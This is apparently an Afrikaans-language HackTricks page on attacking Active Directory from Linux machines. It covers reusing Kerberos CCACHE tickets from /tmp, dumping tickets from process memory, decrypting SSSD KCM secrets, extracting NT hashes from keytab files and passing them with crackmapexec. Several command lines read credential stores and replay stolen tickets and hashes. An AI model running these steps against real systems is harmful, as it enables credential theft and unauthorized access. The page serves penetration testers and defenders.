Linux Active Directory
Tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die đŹ Discord groep of die telegram groep of volg ons op Twitter đŠ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
ân Linux masjien kan ook teenwoordig wees binne ân Active Directory omgewing.
ân Linux masjien in ân AD mag verskillende CCACHE kaartjies binne lĂȘers stoor. Hierdie kaartjies kan gebruik en misbruik word soos enige ander kerberos kaartjie. Om hierdie kaartjies te lees, moet jy die gebruiker-eienaar van die kaartjie wees of root binne die masjien.
Enumerasie
AD enumerasie vanaf linux
As jy toegang het tot ân AD in linux (of bash in Windows) kan jy probeer https://github.com/lefayjey/linWinPwn om die AD te enumerate.
Jy kan ook die volgende bladsy nagaan om ander maniere te leer om AD vanaf linux te enumerate:
389, 636, 3268, 3269 - Pentesting LDAP
FreeIPA
FreeIPA is ân oopbron alternatief vir Microsoft Windows Active Directory, hoofsaaklik vir Unix omgewings. Dit kombineer ân volledige LDAP gids met ân MIT Kerberos Sleutelverspreidingsentrum vir bestuur soortgelyk aan Active Directory. Dit gebruik die Dogtag Sertifikaatsisteem vir CA & RA sertifikaatbestuur, en ondersteun multi-faktor verifikasie, insluitend slimkaarte. SSSD is geĂŻntegreer vir Unix verifikasieprosesse. Leer meer daaroor in:
Speel met kaartjies
Pass The Ticket
Op hierdie bladsy gaan jy verskillende plekke vind waar jy kerberos kaartjies binne ân linux gasheer kan vind, op die volgende bladsy kan jy leer hoe om hierdie CCache kaartjie formate na Kirbi te transformeer (die formaat wat jy in Windows moet gebruik) en ook hoe om ân PTT aanval uit te voer:
CCACHE kaartjie hergebruik vanaf /tmp
CCACHE lĂȘers is binĂȘre formate vir storing van Kerberos geloofsbriewe wat tipies met 600 toestemmings in /tmp gestoor word. Hierdie lĂȘers kan geĂŻdentifiseer word deur hul naamformaat, krb5cc_%{uid}, wat ooreenstem met die gebruiker se UID. Vir verifikasie van die verifikasieticket, moet die omgewing veranderlike KRB5CCNAME op die pad van die gewenste kaartjie lĂȘer gestel word, wat hergebruik daarvan moontlik maak.
Lys die huidige kaartjie wat vir verifikasie gebruik word met env | grep KRB5CCNAME. Die formaat is draagbaar en die kaartjie kan hergebruik word deur die omgewing veranderlike met export KRB5CCNAME=/tmp/ticket.ccache te stel. Kerberos kaartjie naamformaat is krb5cc_%{uid} waar uid die gebruiker se UID is.
# Find tickets
ls /tmp/ | grep krb5cc
krb5cc_1000
# Prepare to use it
export KRB5CCNAME=/tmp/krb5cc_1000
CCACHE kaart hergebruik vanaf sleutelring
Kerberos-kaarte wat in ân proses se geheue gestoor is, kan onttrek word, veral wanneer die masjien se ptrace-beskerming gedeaktiveer is (/proc/sys/kernel/yama/ptrace_scope). ân Nuttige hulpmiddel vir hierdie doel is te vind by https://github.com/TarlogicSecurity/tickey, wat die onttrekking vergemaklik deur in sessies in te spuit en kaarte in /tmp te dump.
Om hierdie hulpmiddel te konfigureer en te gebruik, word die onderstaande stappe gevolg:
git clone https://github.com/TarlogicSecurity/tickey
cd tickey/tickey
make CONF=Release
/tmp/tickey -i
Hierdie prosedure sal probeer om in verskeie sessies in te spuit, wat sukses aandui deur onttrokken kaartjies in /tmp te stoor met ân naamkonvensie van __krb_UID.ccache.
CCACHE kaartjie hergebruik van SSSD KCM
SSSD hou ân kopie van die databasis by die pad /var/lib/sss/secrets/secrets.ldb. Die ooreenstemmende sleutel word as ân verborge lĂȘer by die pad /var/lib/sss/secrets/.secrets.mkey gestoor. Standaard is die sleutel slegs leesbaar as jy root regte het.
Die aanroep van SSSDKCMExtractor met die âdatabase en âkey parameters sal die databasis ontleed en die geheime ontcijfer.
git clone https://github.com/fireeye/SSSDKCMExtractor
python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
Die credential cache Kerberos blob kan in ân bruikbare Kerberos CCache lĂȘer omgeskakel word wat aan Mimikatz/Rubeus oorgedra kan word.
CCACHE kaartjie hergebruik vanaf keytab
git clone https://github.com/its-a-feature/KeytabParser
python KeytabParser.py /etc/krb5.keytab
klist -k /etc/krb5.keytab
Trek rekeninge uit /etc/krb5.keytab
Diensrekening sleutels, wat noodsaaklik is vir dienste wat met wortelprivileges werk, word veilig gestoor in /etc/krb5.keytab lĂȘers. Hierdie sleutels, soortgelyk aan wagwoorde vir dienste, vereis streng vertroulikheid.
Om die inhoud van die keytab-lĂȘer te inspekteer, kan klist gebruik word. Die hulpmiddel is ontwerp om sleuteldetails te vertoon, insluitend die NT Hash vir gebruikersverifikasie, veral wanneer die sleuteltipe as 23 geĂŻdentifiseer word.
klist.exe -t -K -e -k FILE:C:/Path/to/your/krb5.keytab
# Output includes service principal details and the NT Hash
Vir Linux gebruikers bied KeyTabExtract funksionaliteit om die RC4 HMAC-has te onttrek, wat benut kan word vir NTLM-has hergebruik.
python3 keytabextract.py krb5.keytab
# Expected output varies based on hash availability
Op macOS dien bifrost as ân hulpmiddel vir die ontleding van keytab-lĂȘers.
./bifrost -action dump -source keytab -path /path/to/your/file
Deur die onttrokken rekening- en hash-inligting te gebruik, kan verbindings met bedieners gevestig word met behulp van gereedskap soos crackmapexec.
crackmapexec 10.XXX.XXX.XXX -u 'ServiceAccount$' -H "HashPlaceholder" -d "YourDOMAIN"
Verwysings
- https://www.tarlogic.com/blog/how-to-attack-kerberos/
- https://github.com/TarlogicSecurity/tickey
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory
Tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die đŹ Discord groep of die telegram groep of volg ons op Twitter đŠ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
HackTricks

